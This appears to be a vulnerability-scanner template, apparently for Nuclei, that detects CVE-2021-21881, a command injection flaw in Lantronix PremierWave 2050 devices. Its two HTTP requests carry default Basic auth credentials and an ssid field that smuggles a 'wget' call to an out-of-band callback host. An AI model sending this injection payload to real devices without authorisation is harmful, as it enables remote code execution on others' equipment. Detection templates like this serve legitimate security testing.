2022-01-04 14:14:12 +00:00
id : CVE-2021-21881
info :
2022-05-09 16:12:52 +00:00
name : Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
2022-01-04 14:14:12 +00:00
author : gy741
severity : critical
2022-05-09 16:12:52 +00:00
description : Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.
2022-01-04 14:14:12 +00:00
reference :
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325
2022-01-05 07:29:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-21881
2022-01-04 14:14:12 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.9
2022-01-04 14:14:12 +00:00
cve-id : CVE-2021-21881
cwe-id : CWE-78
2022-01-05 07:29:27 +00:00
tags : cve,cve2021,lantronix,rce,oast,cisco
2022-01-04 14:14:12 +00:00
requests :
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Authorization : Basic dXNlcjp1c2Vy
Content-Type : application/x-www-form-urlencoded
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
2022-01-05 07:29:27 +00:00
- |
2022-01-04 14:14:12 +00:00
POST / HTTP/1.1
Host : {{Hostname}}
2022-01-05 07:29:27 +00:00
Authorization : Basic YWRtaW46UEFTUw==
2022-01-05 07:30:40 +00:00
Content-Type : application/x-www-form-urlencoded
2022-01-04 14:14:12 +00:00
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2022-05-09 16:12:52 +00:00
# Enhanced by mp on 2022/05/05